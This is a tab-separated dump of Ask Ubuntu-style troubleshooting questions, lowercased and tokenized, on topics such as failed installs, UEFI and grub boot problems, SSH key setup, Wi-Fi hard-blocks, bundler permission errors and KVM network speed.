503783	trouble installing ubuntu 14.04 : initramfs	i am new to stackexchange and hope to soon be new to ubuntu . i 'm trying to install ubuntu on a newly constructed desktop . i first tried to install it via a usb drive , but the computer did n't appear to recognize it as it always resulted in a disk boot failure . i then tried burning to a dvd and installing that way . after the bios/motherboard screen , it reads boot from cd ( or something similar ) and proceeds with no problem . it shows a black screen with a small icon resembling a keyboard and a person . at this point , if i press a key it brings up the language preference and a menu in ubuntu with the following options ( paraphrased ) : try ubuntu without installing , install ubuntu , check for disk defects , test system memory , boot from first hard disk . try ubuntu , install ubuntu , and boot from first disk all lead to a command line-like prompt that says '' busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built in shell ( ash ) enter 'help ' for a list of built in commands ( initramfs ) '' alternatively , if i do n't press a key during the keyboard and person prompt , it just goes directly to the initramfs prompt . also , as of just recently in addition to the busybox line it included another statement `` unable to find a medium containing a live file system . '' i 've gotten help from two friends of mine ( studying computer science and computer engineering ) with no luck . i burned the disk off of my macbook . when i try putting the disk into my mac it says that the disk is unreadable . most of the forums that i 've looked at for answers had similar questions , but they did n't appear to address my particular instance . please help me to install ubuntu , thank you .
503790	problem using virtual terminal	how can i copy-paste following command : rm -r ~/.gconf/apps/gnome-terminal gconftools -- recursive-unset /apps/gnome-terminal into a virtual-terminal ?
503791	switching applications window is behind open programs	i know pressing alt+tab a window of open apps pops up . if i have an application open the pop up window is behind the open app so i ca n't see it making it essentially useless . is there any way where i can set it up where it shows on-top of all other apps ? also i do n't know if it matters but i have a dual screen set up which might be causing this .
503794	prevent force-close an app or reopen an app upon close	i have a custom dock , and i have virtually disabled the unity launcher , by disabling all the shortcuts that have access to launcher/dash/hud . but now i want the dock application to reopen as soon as it is force-closed due to some problem . what i am trying to do is something like the process explorer.exe in windows . if it crashes , it automatically reopens . can i do the same in ubuntu ?
503796	how to make a portable kubuntu on external drive ( gpt ) on uefi computer ?	the problem : after installation kubuntu on external ssd ( transcend esd400 512gb ) on uefi computer i ca n't use it on another one . i made some attempts but all of them were unsuccessful . my computer : uefi , core i7 - 4 cores , windows 7 ultimate 64bit , 2 internal drives with gpt , external ssd with gpt . kubuntu distro : liveusb , created with universal usb installer 1.9.5.4 , kubuntu 14.04 lts external ssd was partitioned with gparted , partitions are alligned . after each installation ssd was formatted and repartitioned . grub was checked : version 2.02 , efi ( not grub-pc ) . attempt 1 : with plugged internal drives . i booted from liveusb . perform usual installation . my partition table : 512mb - efi - fat32 30gb - / - ext4 100gb - /home - ext4 50gb - /usr - ext4 50gb - /opt - ext4 bootloader was installed on external ssd ( /dev/sdc ) . after rebooting i found 2 boot entries ubuntu in uefi . if my external ssd is plugged and i choose every of this 2 entries - everything works well : kubuntu starts and works . if the external ssd is off - a black screen minimal bash-like line editing is supported appeared . if i choose uefi ts512 ... ( boot entry with label of the external ssd ) , it seems that the next entry works ( windows boot manager ) . attempt 2 : with unpluged internal drives . installation procedure was the same . after rebooting system started and worked . but after plugging the internal drives , on booting from external ( both ubuntu and uefi ts512 ... entries ) a black screen with blinking text cursor appears and nothing wants to start . if i choose windows boot manager windows starts well . attempt 3 : tried to modify efi files . copied grubx64.efi from /dev/sda1 to dev/sdc1 and renamed to bootx64.efi . nothing new - it goes down the list of entries until windows boot manager . attempt 4 : tried to modify grub.cfg and fstab . in /boot/grub/grub.cfg replaces all hd2 with hd0 . and in fstab i changed the uuid of efi partition : before it pointed to /dev/sda1 , now it points to /dev/sdc1 . so how can i make a portable system on external ssd , that will boot on every uefi computer , but not only on mine ?
503802	infinite login loop - signature not found in user keyring	i am using ubuntu 13.10 , which i installed almost 6 months back . while installation i selected home folder encryption . however , being a newbie i did not note mount passphrase ( i thought how important this could be ! apparently that is all i need right now ) . everything worked fine until 3 days back . i changed my login password , locked the screen and unlocked it using new password to make sure everything is fine . a few seconds later the computer shut down due to power supply cut-off ( yes , battery is dead , hence the machine is directly powered by cable ) . i restarted the laptop and i was not able to login , the login screen was being thrown back after correct password entry ( so basically there was a login loop ) . however , i was able to login to tty1 with the error message : '' signature not found in user keyring . perhaps try the interactive 'ecryptfs-mount-private ' `` i tried solutions this , this and this . these basically suggest to 1 ) deleting ~/.xauthority 2 ) sudo chown -r $ user : $ user $ home 3 ) sudo dpkg-reconfigure lightdm 4 ) sudo chmod a+wt /tmp none of these work . now all i hope is to recover my 6 months of work ( coding project i was working on ) . using sudo ecryptfs-recover-private ( either via another account or live usb ) prompts me for login passphrase . i tried using the new password or the preceding password . but both throw error : '' error : unwrapping passphrase and inserting into the user session keyring failed [ -5 ] info : check the system log for more information from libecryptfs `` i have changed the login password a couple of times during last 6 months . i only remember last 2 passwords i.e . the one which is throwing login loop and one previous to that . could you please tell me if something can be done to recover data ?
503803	ubuntu and a epson artisan 835 printer not installing ( install locks up )	ubuntu 14.04 lts and a epson artisan 835 printer not installing ( install locks up ) . i use set-up , printers , and choose the epson . it starts to install and locks up about half way . is there a way to install it in through bash and how would i do that ?
503804	zukitwo theme , white text on white background	i 'm using ubuntu 14.04 , and i have this problem only in 14.04 . when i select some of these themes : zukitwo , orion , zukiwi ... i get white text on white top panel like on picture below : how can i fix this ?
503805	i can not delete a folder from a driver ( ubuntu 13.04 )	when i try to delete a folder from a drive its saying through ui error while deleting . could not remove the folder new_movie when i clicked show details , its showing could not remove the folder new_movie so i tried to delete that folder from command line , after i mount the driver when i try to delete that folder with the following command rm -rf < folder_name > rm : can not remove âfolder_nameâ : directory not empty additional information : even i tried to delete that in windows , its saying can not delete the folder
503807	which driver do i need to install hl-2250dn ?	brother provides it 's drivers here . which one do i need and what is the exact procedure ? solved .
503808	how can i configure a second ssh key + user for a single server ?	i have a ssh key which is passphrase-protected . authentication to the server is by ssh key only , password authentication is disabled . both the server and my desktop run ubuntu 14.04 and authentication with that key and server is tested and working . my goal is to have cron copy files from my desktop machine to the server via rsync . i plan to create a new 'backups-user ' ( with limited rights ) on the server , and have cron running on my desktop to copy the files to the server as this second user . that should avoid the issue of having to enter the passphrase for my primary ssh key . my problem is that i keep getting `` permission denied ( publickey ) '' errors when i try to ssh-copy-id the second ssh key to the server . both ssh keys ( public and private ) were created and are in ~/.ssh/ on my desktop . the user 'backups-user ' was created on the server , but i can not log in as that user yet . am i going about this the wrong way , or is there a better method of automating what i want to do ? here is the output of ssh -v : tom @ desktop : ~ $ ssh -v backups-user @ xx.xx.xx.xx openssh_6.6.1 , openssl 1.0.1f 6 jan 2014 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to xx.xx.xx.xx [ xx.xx.xx.xx ] port 22. debug1 : connection established . debug1 : identity file /home/tom/.ssh/id_rsa type -1 debug1 : identity file /home/tom/.ssh/id_rsa-cert type -1 debug1 : identity file /home/tom/.ssh/id_dsa type -1 debug1 : identity file /home/tom/.ssh/id_dsa-cert type -1 debug1 : identity file /home/tom/.ssh/id_ecdsa type -1 debug1 : identity file /home/tom/.ssh/id_ecdsa-cert type -1 debug1 : identity file /home/tom/.ssh/id_ed25519 type -1 debug1 : identity file /home/tom/.ssh/id_ed25519-cert type -1 debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.6.1p1 ubuntu-2ubuntu2 debug1 : remote protocol version 2.0 , remote software version openssh_6.6.1p1 ubuntu-2ubuntu2 debug1 : match : openssh_6.6.1p1 ubuntu-2ubuntu2 pat openssh_6.6.1* compat 0x04000000 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5-etm @ openssh.com none debug1 : kex : client- > server aes128-ctr hmac-md5-etm @ openssh.com none debug1 : sending ssh2_msg_kex_ecdh_init debug1 : expecting ssh2_msg_kex_ecdh_reply debug1 : server host key : ecdsa ( redacted ) debug1 : host 'xx.xx.xx.xx ' is known and matches the ecdsa host key . debug1 : found key in /home/tom/.ssh/known_hosts:2 debug1 : ssh_ecdsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : tom @ desktop debug1 : authentications that can continue : publickey debug1 : offering rsa public key : tom @ desktop debug1 : authentications that can continue : publickey debug1 : trying private key : /home/tom/.ssh/id_rsa debug1 : trying private key : /home/tom/.ssh/id_dsa debug1 : trying private key : /home/tom/.ssh/id_ecdsa debug1 : trying private key : /home/tom/.ssh/id_ed25519 debug1 : no more authentication methods to try . permission denied ( publickey ) .
503809	wifi is hard-blocked and ethernet connection fails - [ ubuntu 14.04 ] - [ asus b43s-xh51 ]	i was just using this laptop yesterday on ethernet and a few days ago on wifi . i 've never had a problem with this computer and wifi . i currently only have ubuntu 14.04 installed - no dual-boot with windows anymore . sometimes the wifi reads as not being accessible due to a hardware switch , other times it just says that it 's disabled . i have also tried fn-f2 , and it does change the output of rfkill list all , but the wifi stays constant as hard-blocked . rfkill list all 0 : asus-wlan : wireless lan soft blocked : no hard blocked : no 1 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : yes ifconfig eth0 link encap : ethernet hwaddr f4:6d:04:4a:07:25 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : f7d00000-f7d20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:231 errors:0 dropped:0 overruns:0 frame:0 tx packets:231 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:17265 ( 17.2 kb ) tx bytes:17265 ( 17.2 kb ) interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback iwlwifi.conf # /etc/modprobe.d/iwlwifi.conf # iwlwifi will dyamically load either iwldvm or iwlmvm depending on the # microcode file installed on the system . when removing iwlwifi , first # remove the iwl ? vm module and then iwlwifi . remove iwlwifi \ ( /sbin/lsmod | grep -o -e ^iwlmvm -e ^iwldvm -e ^iwlwifi | xargs /sbin/rmmod ) \ & & /sbin/modprobe -r mac80211 nm-tool networkmanager tool state : disconnected - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : unavailable default : no hw address : 88:53:2e:55 : db:6a capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : unavailable default : no hw address : f4:6d:04:4a:07:25 capabilities : carrier detect : yes wired properties carrier : off lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation 6 series/c200 series chipset family kt controller ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579lm gigabit network connection ( rev 05 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation qm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] seymour [ radeon hd 6400m/7400m series ] 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] caicos hdmi audio [ radeon hd 6400 series ] 03:00.0 network controller : intel corporation centrino advanced-n 6230 [ rainbow peak ] ( rev 34 ) 06:00.0 usb controller : fresco logic fl1000g usb 3.0 host controller ( rev 04 )
503812	tourble submitting desktop app for review `` payment details are required before any application can be reviewed ''	i am trying to submit an app ( ubuntu desktop ) in the software center through here : https : //myapps.developer.ubuntu.com/dev/apps/ after filling in all the required fields and clicking the button `` submit for review '' , i receive the following message : '' payment details are required before any application can be reviewed '' how could this issue be resolved ? thank you , -nikos
503817	language problem	i have been using ubuntu for my official purpose . actually i have installed ubuntu 14.04 desktop version os in one server . everything is fine but when i try to execute command ls -ltr then is shows some part in other language . eg : rwxr-xr-x 2 ntnat ntnat 4096 à¤«à¤¼à¤°à¤µà¤°à¥ 17 05:15 desktop drwxr-xr-x 2 ntnat ntnat 4096 à¤«à¤¼à¤°à¤µà¤°à¥ 17 05:15 videos drwxr-xr-x 2 ntnat ntnat 4096 à¤«à¤¼à¤°à¤µà¤°à¥ 17 05:15 templates drwxr-xr-x 2 ntnat ntnat 4096 à¤«à¤¼à¤°à¤µà¤°à¥ 17 05:15 public drwxr-xr-x 2 ntnat ntnat 4096 à¤«à¤¼à¤°à¤µà¤°à¥ 17 05:15 pictures from a fully english install for comparison . drwxrwxrwx 6 tim tim 4096 jul 26 15:47 desktop drwxrwxrwx 6 tim tim 4096 jul 23 10:06 videos drwxrwxrwx 2 tim tim 4096 may 12 19:22 templates drwxrwxrwx 8 tim tim 4096 jul 3 18:53 public drwxrwxrwx 6 tim tim 12288 jul 28 15:33 pictures
503818	datacards not working in ubuntu 14.04	no ethernet card is getting connected in 14.04 . in 13.10 it was working just fine .
503825	xrandr changes resolution on it 's own initiave	i am running ubuntu 14.04 with bumblebee . i 've got an hd 4000 and a 635m , and as many of you know the display is controlled by the intel card . i have a crt that can reach refresh rates up to 120 hz . but the edid info sent by the monitor says the max rate it can achieve is 85 hz . i already tried to override edid but the new i915 does n't let me do that . i can add a custom resolution through xrandr -- newmode `` 1024x768_90.00.. ( all cvt stuff ) xrandr -- addmode vga1 `` 1024x768_90.00 '' xrandr -- output vga1 -- mode `` 1024x768_90.00 '' i already made it permanent through a xorg.conf in /etc/x11/xorg.conf.d/ : section `` device '' identifier `` 3rd gen core processor graphics controller '' busid `` pci:00:02:0 '' driver `` i915 '' option `` monitor-vga1 '' `` vga1 '' option `` monitor-lvds1 '' `` lvds1 '' endsection section `` screen '' identifier `` screen0 '' device `` 3rd gen core processor graphics controller '' monitor `` vga1 '' subsection `` display '' depth 24 modes `` 1024x768_90.00 '' `` 800x600_110.00 '' `` 640x480_120.00 '' `` 1366x768 '' endsubsection endsection section `` monitor '' identifier `` lvds1 '' endsection section `` monitor '' identifier `` vga1 '' modeline `` 1024x768_90.00 '' 100.25 1024 1096 1200 1376 768 771 775 812 -hsync +vsync modeline `` 800x600_110.00 '' 75.50 800 856 936 1072 600 603 607 642 -hsync +vsync modeline `` 640x480_120.00 '' 52.50 640 680 744 848 480 483 487 518 -hsync +vsync endsection preferredmode does n't work . now the problem is , after having set the right mode , if any app try update randr , like if i use xrandr again or i open teamspeak or ubuntu sdk , the rate is set back to 85 hz . now , if the app that updates randr is commandline-like , to set back the resolution i have to rewrite this exatrly three times : xrandr -- output vga1 -- mode `` 1024x768_90.00 '' the first two times both screens turn black for a second and than nothing changes ( still 85 hz ) . the third , only the crt turns black and then , 90hz . if it 's persistent ( window like ) the resolution is locked . i ca n't use 90 hz until i close teamspeak . now how can i solve the problem ? i mean , the default res should be 1024x768 90hz , and when a game picks , for example , 800x600 , the rate has to be 110 hz , not 85 . is there a way to delete or ban standard resolutions ? -- delmode does n't work : x error of failed request : badaccess ( attempt to access private resource denied ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 19 ( rrdeleteoutputmode ) serial number of failed request : 39 c urrent serial number in output stream : 40 thanks in advance .
503826	how to config the linux kernel ?	i have a question on the kernel configuration in the linux androidhlos sw package in the ubuntu developing environment . i checked the .config file in our target- the android mobile phone , the config_i2c_gpio is not enabled , and i need to active it because i plan to use the bit-bang i2c gpio . what is the method to change the kernel configuration file ? i tried this : $ work/androidhlos $ ls abi build.sh device kernel out setenv.sh art cts docs libcore packages system bionic dalvik external libnativehelper pdk tools bootable developers frameworks makefile prebuilts vendor build development hardware ndk sdk $ cd kernel $ make config but it does n't work . can anybody know tell me how to configure the kernel ?
503828	terminal strange behavior scrolls pages itself	sometimes i am using the terminal console like any other user and suddenly the previous commands shows up at rhythm of the cursor so like 1-2 seconds blinks and scrolls pages , so strange and very annoying .
503843	tweak macbook pro touchpad on ubuntu	i am using macbook pro with ubuntu . when i touch the touchpad with two fingers , there are two scenarios that can happen : i tap with two fingers , a mouse right click is simulated i slide with two fingers , a scroll is simulated however i find that if i slide a short distance , the touchpad first understands it as a scroll and fires scroll event , but then it also fires a right mouse click . what i want to tweak is to make the touchpad fire scroll event only when i slide my fingers a very short distance , is there something like a threshold to adjust ?
503844	bundle install fatal error	i am migrating my project over to a new machine and i am having trouble running bundle install on the machine i am trying to use . when i run : bundle install i get this error : unfortunately , a fatal error has occurred . please see the bundler troubleshooting documentation at http : //bit.ly/bundler-issues . thanks ! /home/zach/.rvm/rubies/ruby-2.0.0-p451/lib/ruby/2.0.0/fileutils.rb:245 : in `mkdir ' : permission denied - /home/zach/handcoop/project/handco-op/vendor/bundle/ruby/2.0.0 ( errno : :eacces ) from /home/zach/.rvm/rubies/ruby-2.0.0-p451/lib/ruby/2.0.0/fileutils.rb:245 : in `fu_mkdir' from /home/zach/.rvm/rubies/ruby-2.0.0-p451/lib/ruby/2.0.0/fileutils.rb:219 : in `block ( 2 levels ) in mkdir_p' from /home/zach/.rvm/rubies/ruby-2.0.0-p451/lib/ruby/2.0.0/fileutils.rb:217 : in `reverse_each' from /home/zach/.rvm/rubies/ruby-2.0.0-p451/lib/ruby/2.0.0/fileutils.rb:217 : in `block in mkdir_p' from /home/zach/.rvm/rubies/ruby-2.0.0-p451/lib/ruby/2.0.0/fileutils.rb:203 : in `each' from /home/zach/.rvm/rubies/ruby-2.0.0-p451/lib/ruby/2.0.0/fileutils.rb:203 : in `mkdir_p' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler.rb:294 : in `mkdir_p' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/installer.rb:325 : in `create_bundle_path' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/installer.rb:51 : in `run' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/installer.rb:15 : in `install' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/cli/install.rb:78 : in `run' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/cli.rb:145 : in `install' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/vendor/thor/command.rb:27 : in `run' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/vendor/thor/invocation.rb:121 : in `invoke_command' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/vendor/thor.rb:363 : in `dispatch' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/vendor/thor/base.rb:440 : in `start' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/cli.rb:9 : in `start' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/bin/bundle:20 : in `block in < top ( required ) > ' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/lib/bundler/friendly_errors.rb:5 : in `with_friendly_errors' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/gems/bundler-1.6.5/bin/bundle:18 : in ` < top ( required ) > ' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/bin/bundle:23 : in `load' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/bin/bundle:23 : in ` < main > ' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/bin/ruby_executable_hooks:15 : in `eval' from /home/zach/.rvm/gems/ruby-2.0.0-p451 @ global/bin/ruby_executable_hooks:15 : in ` < main > ' i have ran gem install bundler and it successfully ran and i have made sure my version of ruby is the same as the version the project was built in i am running out of ideas and am lost . thank you anyone who knows what is going wrong and for taking the time to help me . output of ls -l : total 20 drwxr-xr-x 2 root root 4096 jul 24 17:52 bin drwxr-xr-x 2 root root 4096 jul 24 17:53 cache drwxr-xr-x 2 root root 4096 jul 24 17:51 doc drwxr-xr-x 49 root root 4096 jul 24 17:53 gems drwxr-xr-x 2 root root 4096 jul 24 17:53 specifications cd .. ls -l : total 4 drwxrwxr-x 7 root root 4096 jul 24 17:51 1.9.1 hope this helps ! =d
503848	how do i run ubuntu in headless mode ?	i would like to set up ubuntu in headless mode - configured to operate without a monitor , keyboard , and mouse ; probably without access to graphics hardware altogether . the rationale for this is : i will have a kvm virtual machine running that would have graphics hardware to itself . how do i do it ? which ubuntu distribution could i be using and why ? the options that come to my mind are desktop and server , but both do n't offer an option to be installed in headless mode by default , or do they ? i am going to install ubuntu 14.04 lts x86_64 on a thinkpad x series ( intel integrated graphics ) .
503851	no sound in ubuntu studio 14.04.1	when playing video and audio files , or on youtube , there is not sound output . any solution ?
503857	upgrade from 12.04 to 14.04	how can i upgrade from ubuntu 12.04 to 14.04 ? using the update manager the suggestion is to upgrade to 12.10 but this does not work ( fetching the upgrade failed ) . has someone an idea ? br andy
503859	making konsole to be login shell by default	i do n't know why there are `` login '' and `` non-login '' shells in the first place , and i 'm not very eager to know . the fact is that the rvm and nvm software that i use frequently require login shells , and konsole starts a non-login shell . this forces me to submit a bash -l command every time i start a konsole . how do i make konsole start in login shell mode by default ?
503860	vlc wo n't open - undefined symbol : pl_get	some time ago i had installed vlc and it played without a single problem . then , seeing that it was a 2.1.x version , i decided to update it to 2.2.x so that i could use the vlsub plugin . so i followed the commands shown in a few sites , but since then it has never worked again . the icon is shown and it is definitely installed , however , it just wo n't start . i have tried uninstalling and installing it multiple times without any luck . i have done this through the software centre and via terminal . i have also tried purging the files and deleting any folders related to vlc i could find , namely /.config/vlc or /.vlc ( i also found a vlc folder in /usr/lib but i was afraid of deleting it ) . i suppose the only help i have got is this , when trying to run it through terminal : stephen @ event-horizon : ~ $ vlc vlc media player 2.1.4 rincewind ( revision 2.1.4-0-g2a072be ) vlc : symbol lookup error : /usr/lib/libvlc.so.5 : undefined symbol : pl_get i could really use your help , since smplayer tends to display a lot of tearing ( any help with that also welcome ) .
503863	poor upload speed in kvm guest with virtio eth driver in openstack on 3.14	after upgrading an openstack compute node to the 3.14 kernel , i am getting poor upload speed from all kvm guests when using virtio ethernet driver . download speeds are unaffected and http download stays at a constant 50 mb/s , however uploads start at 2 mb/s and drop down to kilobits per second ( on a 1 gbps network ) . this includes both tx out of the network and tx between virtual machines . setup : openstack icehouse with neutron networking gre tunneled network under ml2 plugin via openvswitch gro is disabled on all physical interfaces , which are on igb 2.0.5 driver data interfaces are connected via 1gbit ports/switch single dedicated network node with several compute nodes all servers running 14.04 ( also tried 14.10 on one compute node but issue persists ) once driver is switched to e1000 , the network performance returns to expected speed ( but e1000 yields worse performance than virtio ; around 16 mb/s upload ) . additionally , on another node still running 3.13 kernel , the upload speed is > 50 mb/s ( and transfer from vm on 3.13 node to vm on 3.14 node is fine , while transfer in opposite direction has this choppy upload issue ) . in ssh on the guest , simply running cat on a 2000-line file shows the issue , with freezes every 2 seconds . on normal guest it prints within half a second . note that only compute node is affected by this issue -- with two compute nodes in the same cluster , one node running 3.13 and the other running 3.14 , and neutron network node running something else ( should n't matter but i think it 's on 3.16 at the moment ) , the 3.13 is still fine while guests on 3.14 node have the problem . i noticed bug report in https : //bugzilla.kernel.org/show_bug.cgi ? id=74851 . however a ) it 's my understanding that ip forwarding is not needed on compute node ( after disabling it via `` echo 0 > /proc/sys/net/ipv4/ip_forward '' the guest network still runs ) and b ) after upgrading to newest 3.14 , newest 3.15 , and newest 3.16 from http : //kernel.ubuntu.com/~kernel-ppa/mainline/ the issue persists .
503866	configuring server to receive traffic at a specific ip address	i have a go program ( full program at this gist https : //gist.github.com/42a45b3926e733ef7b34 ) that when i run on my local machine starts a server and handles two routes localhost:8080 and localhost:8080/login . it does this by listening and serving on port 8080 err : = http.listenandserve ( `` :8080 '' , nil ) i installed go on an ubuntu server and am able to run the program , however , when i go to my ip addresss 107.170.xx.xx:8080 and/or 107.170.xx.xx:8080/login , my browser appears to be trying to connect and then i get a message that a page is n't available i assumed that my ip address on the remote server was , for the purpose of running this program , similar to localhost on my local machine , in that if i simply run the go program on my localmachine and can view it in the browser , should n't i be able to do the same on the remote machine by going to the ip address ? is there some other type of configuration i need to set up in order to connect to the program at my ip address ? note , when i configured the ip tables , it was done to receive connections on port 22 for ssh and 80 for web traffic .
503867	ubuntu 14.04 with encrypted raid6 and separate drive	i 'm relatively new to ubuntu server and i 'm attempting to setup a new server/nas . it is made of : 4 x 2tb physical drives a 60gb physical ssd the 4 x 2tb drives each have a full disk partition set to `` raid '' , and `` logical . '' they are all configured into a md0 raid6 . i thought the mount point for this was /home . the 60gb drive has a full disk partition , set to `` etx4 '' , mounted as / , and `` primary . '' there is no swap , as i read that with 4gb of ram it should be fine , since it is a server with minimum activity and only a few programs running . the raid array is done syncing , however after i boot and the login prompt appears . i type in the user name i want and hit enter and rather than seeing a password prompt , the drives just spin up and then the screen dumps back to the login prompt .
503868	can i add widgets to the new unity lock screen in ubuntu 14.04 ?	when i lock my screen using linux mint 17 , there is a giant clock on the lock screen . i got used to this , and now i 'm wondering if i can also add a giant clock ( or any widget , for that matter ) to my ubuntu 14.04 lock screen . is there a way for me to do this with relative ease ?
503872	i 'm facing an error trying to install or update any package ?	i 'm using ubuntu 14.04 and 2 or 3 months ago the system was updating but the internet went down then the system could n't update correctly , since then i 'm facing this error : package operation failed , the installation or removal of a software package failed . i was trying to install vuze torrent package from the ubuntu software-center , but failed according to the preivous error .
503873	lubuntu 13 is unstable ; trouble dling alternate version	i want to download and install 32-bit lubuntu 14 . however , lots of things are interfering with that . also , the fact that i 'm temporarily homeless right now is making a download even more difficult . a major problem is that it 's estimated to take about 5 hours to dl the desktop image . downloading for that length of time can surpass my library wifi session , which breaks the connection and prompts me to re-log-in . the ends the download and makes me need to start over . secondly , there 's also the risk that my monitor will simply shut off , as sometimes it does that when in sleep mode for a duration . ( which i have been unable to fix through the light locker settings . ) i have to force a restart , lose the download again , and start over . using a flash drive in a library computer hardly works either , as the download time surpasses the allotted time allowed on the computers . i tried utilizing the available torrent , but it says the tracker failed , for whatever reason . i 've also tried downloading the file on my smartphone so i could upload it to google drive , but the download fails there too . at this point , what can i do to get my hands on a copy of this desktop image ? what i need : stability , so that i 'm not constantly losing the download progress and starting over something faster than the regular websites , as the time to download is causing most of the problems .
503876	level of entropy in full disk encryption	i would like to know how high the level of entropy is when installing ubuntu and encrypting the installation . as far as i know , the only partition that is not encrypted is the /boot partition because it has the boot loader unencrypted . when i use truecrypt to encrypt windows , i am asked to move the mouse cursor inside the window to create a pool to improve the level of entropy . as ubuntu does not offer something like that , how can i be sure the keys , salts etc . are secure enough ?
503881	help with grub rescue !	i have a ubuntu dell inspiron 5100 . i was in the middle of upgrading to 14.1 ( or something like that ) and my laptop shut off . now , when i turn it on , it goes straight to the black screen that says : error : file not found . grub rescue > i entered ls and was left with ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos1 ) ( hd0 , msdos1 ) is the only one that works when i set the root and prefix . but when i enter insmod normal it says : error : file not found what do i do now ? ? the laptop was working fine , it was just lacking neccessary updates , so i updated it and somehow it shut off midway . i dont know what to do . p.s : i have no other computers , dont have usb with any files for it , and cant get the repair cd . edit : i found a way around the whole insmod problem , but now i need help trying to find my iso . i need it to load my kernel so i can finally boot the computer acording to this : http : //ubuntuforums.org/showthread.php ? t=1599293 i did most of the steps , but i got into a bit of trouble with th insmod part again and i cant find my iso . help please ? i really need to fix this laptop .
503885	streaming from pc to media player	my biggest concern is that i have philips media player hmp5000 and i do n't know if i 'll be able to stream movies from my pc with linux ubuntu ? i want to have only one os on pc..
503886	where is `` killer gegls from outer space '' source code	i want to modify the game killer gegls from outer space . linux os easter egg . only i cant find the source-code . where is it ?
